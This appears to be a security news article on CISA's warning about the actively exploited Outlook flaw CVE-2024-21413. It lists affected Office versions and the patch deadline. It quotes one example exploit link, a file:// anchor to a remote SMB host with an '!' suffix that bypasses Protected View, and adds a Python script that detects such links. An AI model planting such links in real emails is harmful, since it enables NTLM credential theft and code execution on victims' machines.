![CVE-2024-21413](https://securityexpress.info/wp-content/uploads/2025/02/microsoft-office-1024x512.png)
The Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent warning regarding a critical vulnerability in Microsoft Outlook, which is already being actively exploited by threat actors. The advisory is particularly directed at federal agencies. Identified as CVE-2024-21413, this flaw enables remote code execution by bypassing Outlook’s security mechanisms.
Discovered by Check Point, the vulnerability stems from improper input validation when opening emails containing malicious links in vulnerable Outlook versions. Exploiting this flaw allows attackers to circumvent Protected View, a security feature designed to block potentially dangerous content. As a result, malicious Office files open in editing mode, permitting the execution and deployment of malicious code.
Microsoft has patched CVE-2024-21413 (CVSS score: 9.8) but has cautioned that the vulnerability remains exploitable even in document preview mode. Check Point’s report highlights that adversaries have devised a workaround, appending an exclamation mark and random text after the file extension in file:// protocol links. This technique evades Outlook’s security filters and facilitates the execution of malicious payloads.
Example exploit:

```html
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
```
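As an added example (not code from CISA, Check Point or Microsoft), the following Python shows one way a mail-triage script could flag the link shape described above: a `file:` link whose target has a file extension followed by `!` and extra text. The regex, function names and the sample body are assumptions made for this illustration.

```python
import re
from html.parser import HTMLParser

# file: link whose target has a file extension followed by "!" and extra text,
# the link shape the article describes. The regex itself is an assumption of
# this example, not a vendor-published signature.
BANG_LINK_RE = re.compile(
    r"^file:[/\\]*(?P<host>[^/\\!]+)[/\\].*\.(?P<ext>[A-Za-z0-9]{1,8})!(?P<suffix>.+)$",
    re.IGNORECASE | re.DOTALL,
)

class HrefCollector(HTMLParser):
    """Collects href values from <a> tags in an HTML mail body."""
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs.extend(v for k, v in attrs if k == "href" and v)

def normalize(href):
    # Strip whitespace and straight or typographic quotes left around the value.
    return href.strip(" \t\r\n\"'\u201c\u201d")

def find_suspicious_links(html_body):
    """Return one finding per file: link carrying the '!suffix' pattern."""
    collector = HrefCollector()
    collector.feed(html_body)
    collector.close()
    findings = []
    for raw in collector.hrefs:
        m = BANG_LINK_RE.match(normalize(raw))
        if m:
            findings.append({"href": m.group(0), "host": m["host"],
                             "ext": m["ext"].lower(), "suffix": m["suffix"]})
    return findings

# Constructed sample body: the article's example link plus two benign links.
SAMPLE_BODY = r"""
<p><a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a></p>
<p><a href="https://example.com/report.rtf">quarterly report</a></p>
<p><a href="file:///C:/docs/readme.txt">local notes</a></p>
"""

if __name__ == "__main__":
    for f in find_suspicious_links(SAMPLE_BODY):
        print(f"ALERT host={f['host']} ext={f['ext']} suffix={f['suffix']}")
```

A hit is a triage signal for quarantine or review; applying Microsoft's patch remains the remediation the article describes.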
Affected Microsoft Products:
- Microsoft Office LTSC 2021
- Microsoft 365 Apps for Enterprise
- Microsoft Outlook 2016
- Microsoft Office 2019
Successful exploitation of this vulnerability can lead to NTLM credential theft and remote code execution on compromised systems.
Federal agencies have been mandated to remediate the flaw by February 27, in compliance with Binding Operational Directive (BOD) 22-01. CISA underscores that such vulnerabilities are highly attractive targets for cybercriminals and pose a severe risk to government infrastructure. While the directive primarily concerns federal entities, cybersecurity experts strongly urge all organizations to immediately apply security updates to mitigate potential threats.